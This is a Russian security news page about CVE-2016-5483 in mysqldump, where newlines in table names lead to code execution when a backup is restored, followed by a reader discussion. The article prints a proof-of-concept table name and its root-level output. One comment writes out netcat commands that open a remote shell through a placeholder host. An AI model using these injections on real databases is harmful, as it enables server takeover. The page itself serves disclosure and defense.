The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

11.03.2017 09:43  Уязвимость в mysqldump, позволяющая выполнить код при восстановлении бэкапа

Во входящей в состав MySQL утилите mysqldump, используемой для создания резервных копий, выявлена уязвимость (CVE-2016-5483), позволяющая организовать выполнение произвольных shell-команд или привилегированных конструкций SQL во время восстановления резервной копии при помощи утилиты mysql. Код выполнятся с правами администратора, запустившего mysql. Уязвимостью может воспользоваться пользователь СУБД, имеющий права на создание таблиц.

Проблема вызвана особенностью добавления комментариев с названиями таблиц в выводе mysqldump. Атакующий имеет возможность создать таблицу с переводом строки в имени, что приведёт к тому, что при создании дампа в область комментария попадёт только начало имени, а хвост будет перенесён на другую строку и в дальнейшем выполнен при загрузке дампа. Например, атакующий может создать таблицу с именем "evil \! id select user(),@@version/*", разнесённым на три строки:


   CREATE TABLE `evil  
   \! id
   select user(),@@version/*`  (test text);  
При создании резервной копии в дампе, полученном от mysqldump, часть имени окажется вынесена за пределы комментария:

   --
   -- Table structure for table `evil
   \! id
   select user(),@@version/*`  
   --
При восстановлении резервной копии администратором, кроме команд для загрузки фактического содержимого БД, будут запущены и команды "\! id" и "select user(),@@version/*", так как они оказались вне однострочного комментария:

   $ mysql test < backup.sql
   uid=0(root) gid=0(root) groups=0(root) <-- attacker shell command  
   user()    @@version  
   root@localhost    10.1.18-MariaDB <-- attacker sql query  

Злоумышленник может воспользоваться проблемой для оставления лазейки после успешной атаки по подставновке SQL-кода через уязвимое web-приложение (например, атаковать устаревшие плагины к Wordpress). Атакующий может осуществить подстановку команд в резервную копию, затем выждать какое-то время и более активно атаковать систему, чтобы администратор заметил факт взлома web-приложения или повреждения содержимого БД (например, удалив или изменив данные в БД). Выявив факт атаки или нарушения целостности БД администратор попытается восстановить прошлое состояние, используя наиболее свежую версию резервной копии, но так как атакующий заблаговременно позаботился о подстановке в неё своих команд, при восстановлении бэкапа, администратор поспособствует запуску кода атакующего с повышенными привилегиями.

Проблеме подвержены все версии MySQL, в которых уязвимость остаётся неисправленной, а также выпуски MariaDB до 5.5.53 и 10.1. Обновления пакетов с MariaDB уже выпущены Debian и Ubuntu. Уязвимость была обнаружена осенью, но уведомление компании Oracle осталось без ответа, поэтому спустя 90 дней исследователи опубликовали сведения об уязвимости в открытом доступе. В качестве обходного метода защиты предлагается при создании бэкапов запускать утилиту mysqldump с опцией "--skip-comments", воспользоваться альтернативными инструментами резервного копирования MySQL или запретить доступ пользователей СУБД к выполнению операций "create table".

  1. Главная ссылка к новости (https://blog.tarq.io/cve-2016-...)
  2. OpenNews: Уязвимость в MySQL, позволяющая поднять свои привилегии
  3. OpenNews: В MySQL 8.0 отмечается закат хранилища MyISAM
  4. OpenNews: Критическая root-уязвимость в MySQL
  5. OpenNews: Основатели MySQL начали продвижение лицензии BSL, как альтернативы Open Core
  6. OpenNews: Выпуск СУБД MySQL 5.7.13
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: mysql
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение Линейный вид | Ajax | Показать все | RSS
 
  • 1.1, Gemorroj, 10:11, 11/03/2017 [ответить] [смотреть все]
  • –12 +/
    Ну и бред Уязвимость тут на столько мифическая, что о ней можно и не говорить... весь текст скрыт [показать]
     
     
  • 2.2, Аноним, 10:16, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +5 +/
    Не согласен, уязвимость хороша именно тем, что на первый взгляд кажется бесполез... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.36, KonstantinB, 17:00, 11/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Да, но это скорее еще один трюк из разряда методов социнженерии, чем реальная уя... весь текст скрыт [показать]
     
     
  • 4.39, Аноним, 18:25, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Более того, можно сделать так чтобы через браузер показывалось одно, а при загру... весь текст скрыт [показать]
     
     
  • 5.45, KonstantinB, 20:57, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Ясен пень, что смотреть надо то, что запускать собрался, а не что там в браузере... весь текст скрыт [показать]
     
  • 4.48, angra, 21:35, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    А в чем принципиальное отличие от старомодного скачать и запустить ... весь текст скрыт [показать]
     
     
  • 5.49, KonstantinB, 21:41, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Старомодное предполагает разумный промежуточный шаг посмотреть, что собрался за... весь текст скрыт [показать]
     
     
  • 6.51, angra, 23:34, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Ни разу не видел, чтобы в инструкции был шаг Посмотрите, что вы собираетесь зап... весь текст скрыт [показать]
     
     
  • 7.52, KonstantinB, 23:53, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Не работайте под рутом тоже обычно не пишут в инструкциях по установке ПО Я о... весь текст скрыт [показать]
     
     
  • 8.56, angra, 00:25, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Вообще-то обычно в инструкциях указывается какие шаги делаются под пользователем... весь текст скрыт [показать]
     
     
  • 9.64, KonstantinB, 03:27, 13/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    > в случае https curl может и взбрыкнуть

    Если curl "взбрыкивает", то проблема либо с MITM, либо с тем местом, откуда растут руки.

    > это тоже нормально

    По итогам этой ветки искренне надеюсь, что вас не пускают к продакшен-системам сложнее офисной файлопомойки.

     
     
  • 10.66, angra, 06:43, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > Если curl "взбрыкивает", то проблема либо с MITM, либо с тем местом, откуда растут руки.

    Сдается мне, что кое-кто не знает как работает механизм доверия ssl сертификату вообще и для curl в частности. Но это ладно, ты похоже просто не понимаешь для кого предназначены эти однострочники. Это я могу глянуть man curl и найти опцию -k, а вот ЦА этого может и не сделать и просто выберет другое решение, которое не имеет проблем уже на этапе пробной установки.

    > По итогам этой ветки искренне надеюсь, что вас не пускают к продакшен-системам  сложнее офисной файлопомойки.

    Только из-за того, что я умею думать, а не слепо верить в волшебство https?

     
     
  • 11.69, тигар, 09:18, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    >> Если curl "взбрыкивает", то проблема либо с MITM, либо с тем местом, откуда растут руки.
    > Сдается мне, что кое-кто не знает как работает механизм доверия ssl сертификату
    > вообще и для curl в частности. Но это ладно, ты похоже
    > просто не понимаешь для кого предназначены эти однострочники. Это я могу
    > глянуть man curl и найти опцию -k, а вот ЦА этого
    > может и не сделать и просто выберет другое решение, которое не
    > имеет проблем уже на этапе пробной установки.

    про -k и его более длинный алиас curl, кажется, сам подсказывает:-) (если с wget'ом не путаю)

     
     
  • 12.71, angra, 10:15, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Очень даже может быть. Но в таких случаях обычно звучит что-то вроде "я же не админ, чтобы читать сообщение об ошибке".
     
  • 4.61, deadfood, 20:13, 12/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Дада, проверьте что там в несколькогигабайтовом дампе базы данных, а потом рассказывайте про ССЗБ
     
     
  • 5.65, KonstantinB, 03:30, 13/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    > Дада, проверьте что там в несколькогигабайтовом дампе базы данных, а потом рассказывайте
    > про ССЗБ

    Если дамп мой - я и так знаю, что в нем.
    Если нет - то в голову никогда не придет что-то делать из-под своей учетки и тем более рута.

     
     
  • 6.72, пох, 13:05, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > Если дамп мой - я и так знаю, что в нем.

    в нем - create table shit
              \!nc hackhost 6666 /dev/null
              \!nc -l 6666 | /bin/sh
              somemoreshit (...

    попавший туда из-за sql-injection в забытом тобой же три года назад в недрах сайта одноразовом тестовом скрипте. И ты об этом вряд ли узнаешь. А при таком апломбе - ты об этом не узнаешь даже когда тебя таким образом поимеют, поскольку самомнения дохрена, а умения читать и делать выводы из прочитанного - ноль.

    одна надежда, что оракл о тебе позаботится.

    Единственный "твой" дамп, который по настоящему твой - это который ты руками набрал по одной буковке.

     
     
  • 7.75, KonstantinB, 16:00, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    В дамп из-за sql injection? Ну-ка наваляйте proof of concept.
     
     
  • 8.76, KonstantinB, 16:04, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    ...только реалистичный, а не код, создающий динамически таблицы с подстановкой пользовательского ввода. :) С таким проблемы начнутся куда раньше.
     
  • 2.12, Аноним, 12:05, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +6 +/
    1) арендуешь шаредхостинг.
    2) создаешь сайт визитку.
    3) в mysql делаешь табличку.
    4) заходишь в админку хостинга.
    4.1)  делаешь бкап.
    4.2)   восстанавливаешь из бэкапа.

    и вот ты root.

    что там у соседей по хостингу?  энторнет могазин? данные карточек в базе?

     
     
  • 3.14, Gemorroj, 12:58, 11/03/2017 [^] [ответить] [смотреть все]  
  • –2 +/
    чем это отличается от ручного выполнения sql запроса из той же админки то, что ... весь текст скрыт [показать]
     
     
  • 4.40, Аноним, 18:27, 11/03/2017 [^] [ответить] [смотреть все]  
  • +6 +/
    Восстановление может делаться из-под более привилегированного юзера.
     
  • 2.13, apollo2k4, 12:14, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +3 +/
    А почему собственно косяк в парсере не может быть уязвимостью?
     
     
  • 3.15, Gemorroj, 13:00, 11/03/2017 [^] [ответить] [смотреть все]  
  • –2 +/
    конкретно в mysqldump она не имеет ценности в силу сложности ее использования а... весь текст скрыт [показать]
     
     
  • 4.53, XoRe, 23:55, 11/03/2017 [^] [ответить] [смотреть все]  
  • +2 +/
    Если вы не можете придумать, как это использовать, это не означает, что это нево... весь текст скрыт [показать]
     
  • 2.18, Павел Самсонов, 13:18, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +2 +/
    Каку надо писой мыть.
     
     
  • 3.20, Павел Самсонов, 13:23, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    И ещё подкладывть бумажку, и кушать ампицилин :)


     
  • 2.24, angra, 13:39, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Один сценарий для ее использования таки существует Дампу, снятому самостоятельн... весь текст скрыт [показать] [показать ветку]
     
  • 1.3, Аноним, 10:16, 11/03/2017 [ответить] [смотреть все]  
  • +/
    А часто ли бывает, что кто-то имеет право создавать таблицы, но не может делать ... весь текст скрыт [показать]
     
     
  • 2.4, Аноним, 10:39, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Дефолтовые настройки аккаунта для WordPress.
     
  • 2.5, Аноним, 10:44, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    А какая разница Даже если бы злоумышленник мог делать дамп и восстанавливать, э... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.25, angra, 13:42, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    А что раньше мешало подкинуть этому аккаунту исправленный дамп Дампы то у кли... весь текст скрыт [показать]
     
     
  • 4.32, Аноним, 14:21, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Когда дампы хранятся у клиентов, то и восстанавливают их обычно клиенты.
     
     
  • 5.47, angra, 21:32, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Разве что в идеальном мире Где все клиенты люди умные и знающие, а сисадмины ну... весь текст скрыт [показать]
     
  • 1.8, Ydro, 11:19, 11/03/2017 [ответить] [смотреть все]  
  • –6 +/
    Первые два абзаца полная чущь Причём здесь утилита mysqldump В оригинале ясно ... весь текст скрыт [показать]
     
     
  • 2.11, Аноним, 11:45, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Это вы не так поняли В оригинале написано как раз про атаку через выполнение CR... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.19, Ydro, 13:19, 11/03/2017 [^] [ответить] [смотреть все]  
  • –3 +/
    У вас первый абзац оригинальной статьи видимо не отображается mysqldump is a co... весь текст скрыт [показать]
     
     
  • 4.33, Аноним, 14:28, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Разъясняю для непонятливых Злоумышленник создаёт в БД таблицу с многострочным и... весь текст скрыт [показать]
     
  • 2.31, oopsy, 14:13, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    1 mysqldump создаёт обычный кекстовый файл, sql-скрипт, с комментариями и проче... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.60, Ydro, 11:38, 12/03/2017 [^] [ответить] [смотреть все]  
  • –2 +/
    Не надо расписывать как работает mysqldump И отчего вы забыли другие виды комме... весь текст скрыт [показать]
     
  • 1.9, Ilya Indigo, 11:27, 11/03/2017 [ответить] [смотреть все]  
  • +/
    > ... а также выпуски MariaDB до 5.5.53 и 10.1.

    Так 10.1.21 подвержена этой "уязвимости" или нет?

    P.S. В оригинале понятно что нет.
    MariaDB <= 5.5.52 and < 10.1 March 9, 2017

    Не хватает только комментария кое-кого, про то что говорят что кое в чём $subject старый. :-)

     
     
  • 2.43, КО, 19:34, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Там в новости ссылка на CVE по ней пройди и увидишь, что в ветке 10 1 исправлено... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.57, Ilya Indigo, 01:00, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Благодарю.
     
  • 1.16, Павел Самсонов, 13:01, 11/03/2017 [ответить] [смотреть все]  
  • +/
    Ах эта тяга к идеализму :) С точки зрения промышленного станка - надёжность на должном уровне, необходимый уровень безопасности реализован....
     
  • 1.17, Alex_K, 13:17, 11/03/2017 [ответить] [смотреть все]  
  • +1 +/
    Бывают случаи, когда хостер переносит базу с другого хостинга или восстанавливает базу по просьбе клиента из имеющегося бэкапа. Получается, что под рутом делать загрузку удаленного дампа небезопасно.

    Непонятно, почему в принципе допустимы имена таблиц с переносами строк.

     
     
  • 2.21, angra, 13:28, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +4 +/
    ШОК Оказывается нельзя выполнять произвольный sql от рута, а надо логиниться ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.22, Павел Самсонов, 13:30, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Самое печальное, что при этом приходится сидеть на его стуле ... весь текст скрыт [показать]
     
     
  • 4.23, angra, 13:32, 11/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Как тут любит говорить Led, эникеи должны страдать Не хочешь работать ногами, р... весь текст скрыт [показать]
     
     
  • 5.30, vitvegl, 14:06, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Работать ногами - не есть плохо Жим платформы ногами, например Но и головой ду... весь текст скрыт [показать]
     
  • 5.34, Павел Самсонов, 14:32, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Хоть иногда стенки сверлю, а то как же "дом построить"?
     
  • 3.26, Alex_K, 13:45, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Не путайте пользователя root внутри mysql и системного пользователя.
     
     
  • 4.27, angra, 13:51, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Я и не путаю. Я вообще-то про обоих говорил. Принцип один и тот же.
     
     
  • 5.29, Alex_K, 14:02, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > Я и не путаю. Я вообще-то про обоих говорил. Принцип один и
    > тот же.

    Ок.

     
  • 3.44, КО, 19:37, 11/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    Да какая разница, тот кто восстанавливает бакап обычно имеет права на файлы БД, ... весь текст скрыт [показать]
     
  • 2.28, Alex_K, 14:00, 11/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • +1 +/
    Выводы 1 Под рутом ОС загружать сторонний дамп нельзя из-за system E... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.35, тоже аноним, 16:31, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    нет, неправильные Правильные сторонний или даже собственноручный разницы сове... весь текст скрыт [показать]
     
     
  • 4.37, angra, 17:39, 11/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Да и у тебя они не правильные Действия для пользователя, требующие только зна... весь текст скрыт [показать]
     
     
  • 5.54, Анон_, 00:03, 12/03/2017 [^] [ответить] [смотреть все]  
  • +1 +/
    я не знаю пароля пользователя И не имею ни малейшего желания его знать su для ... весь текст скрыт [показать]
     
     
  • 6.59, angra, 03:25, 12/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Ну если ты ничего о мускуле знать не хочешь, то тебе наверное лучше его не админ... весь текст скрыт [показать]
     
     
  • 7.68, Аноним, 08:23, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    apt-get remove mysqld ?

    d:\windows_server\setup.exe ?

     
     
  • 8.70, angra, 10:13, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > apt-get remove mysqld ?

    apt-get remove работает с именами пакетов, а не бинарей на диске.

    > d:\windows_server\setup.exe ?

    Ну это тебе виднее, последний windows server, который я ставил, был 2003-й.

     
  • 8.78, пох, 17:10, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > d:\windows_server\setup.exe ?

    mysql в ней ровно тот же самый и из того же источника.
    А mssql для вебни (не внутрикорпоративной, с пятикилобайтной "строкой" sql-запроса, но и с аж пятью пользователями, которых можно просто заставить не запускать ее одновременно с пяти мест, а паблик, с тысячами пользователей и примитивными insert/delete по полста в секунду) - боюсь, как бы не оказался еще худшим рeшетом, и еще большим тормозом и сборищем глюков.

    И в любом случае это отдельная жизнь, не каждому админу lamp-серверов она дана.
    (обратное тоже верно, судя по спаму, попершему пачками с хостингов гарант-парка)

     
  • 4.38, KonstantinB, 17:43, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Это, кстати, проблема именно mysql В postgresql это решаемо ... весь текст скрыт [показать]
     
     
  • 5.79, mickvav, 14:27, 14/03/2017 [^] [ответить] [смотреть все]    [к модератору]  
  • +/
    Отложить в сторонку хеш пароля пользователя, установить случайный длинный, прийти под этим паролем, поднять дамп, вернуть хеш на место - это как-то уже слишком сложно, да?
     
  • 3.41, Alex_K, 19:03, 11/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Как вариант перед импортом дампа вырезать из него строки, которые начинаются с s... весь текст скрыт [показать]
     
     
  • 4.46, angra, 21:29, 11/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Ну вот какую глупость только не придумают, лишь бы не делать правильно Ну выпол... весь текст скрыт [показать]
     
  • 4.50, Аноним, 21:46, 11/03/2017 [^] [ответить] [смотреть все]  
  • –1 +/
    Аутиста по решению важных вопросов видно из-далека.
     
  • 4.55, Анон_, 00:07, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    правильная обработка untrusted input заключается ровно в обратном - вырезать все... весь текст скрыт [показать]
     
     
  • 5.58, Сифилис, 01:49, 12/03/2017 [^] [ответить] [смотреть все]  
  • +/
    Двойной тоже рвется
     
  • 1.42, Аноним, 19:31, 11/03/2017 [ответить] [смотреть все]  
  • –1 +/
    В MySQL все еще не завезли нормальные ACL для разграничения Events, Trigger, ... весь текст скрыт [показать]
     
  • 1.62, gogo, 21:08, 12/03/2017 [ответить] [смотреть все]  
  • +/
    Вообще, это большой пласт проблем, на которые в mysql никогда даже не хотели разговаривать.
    Безопасно восстановить чужой дамп от имени рута - это общая, тривиальная задача, которая НЕ реализована в mysql/mariadb.

    Начиная с того, что в дампе могут встретится команды use databasename. И заканчивая опубликованным. Какой смысл, что я даю команду "mysql имя_базы < дамп", если я не могу быть уверенным, что данные попадут именно в эту базу?

    Если я должен использовать какие-то сторонние средства, типа использовать логин/пароль юзера, то почему это нельзя реализовать средствами самой утилиты mysql? Или, например, такой функционал должен быть вынесен в mysqladmin, который в принципе подразумевает, что он будет использоваться только админом.

    По аналогии с "tar -x", подобные команды должны быть в mysql/mariadb безопасными, с точки зрения рута.

     
     
  • 2.63, Аноним, 21:26, 12/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –1 +/
    MySQL - Legacy РСБД с грязными хаками как IE6 для веб-макак Не имеет ничего общ... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.73, пох, 13:15, 13/03/2017 [^] [ответить] [смотреть все]  
  • +/
    > MySQL - Legacy РСБД с грязными хаками как IE6 для веб-макак.

    была бы она не для веб-макак, было бы пофигу, что там нет нормального restore. Энтерпрайзную базу я восстанавливаю без особой опаски - туда чужие не ходят.

    > Не имеет ничего общего со стандартизированными или современными решениями включая PgSQL.

    о, да. vacuum full не имеет (сколько лет вам читают мантру что он deprecated, и мы его
    вообще скоро уберем, если не в следующей версии, то хотя бы через одну - точно?)
    Если что - эта радость, вместе с форматом хранения, вызвавшим ее к жизни, унаследована от postgres95 (и да, это год, а предыдущее слово говорит, кто и зачем эту хрень придумал), где у ее существования было вполне понятное
    основание, а идеи использовать ЭТО в продакшне у тех постдоков не было и быть не могло, исключительно исследовательский проект для написания диссера (и докторской руководителем).

     
  • 2.67, Ydro, 08:22, 13/03/2017 [^] [ответить] [смотреть все] [показать ветку]  
  • –2 +/
    Ну, всё, конец света, вырубайте комп. А прогнать дамп на поиск сочетания нежелательных ключевых слов не судьба?
     
     
  • 3.74, пох, 13:24, 13/03/2017 [^] [ответить] [смотреть все]  
  • +2 +/
    > Ну, всё, конец света, вырубайте комп. А прогнать дамп на поиск сочетания
    > нежелательных ключевых слов не судьба?

    а в дампе - статья с опеннета, описывающая проблему.
    (ну либо вовсе статья о разработке/администреже mysql)
    Причем она начинается со второго гигабайта этого дампа.

    Тебе нужен полноценный парсер sql-синтаксиса, старательно обходящий ескейпинги, нерегулярности и чудеса собственно mysqldump. Та еще жопа. Я до сих пор бережно храню regex, вырезающий из дампа (статичного и с точно известной начинкой) нужные поля, сам ниасилил.

     

     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:


      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor TopList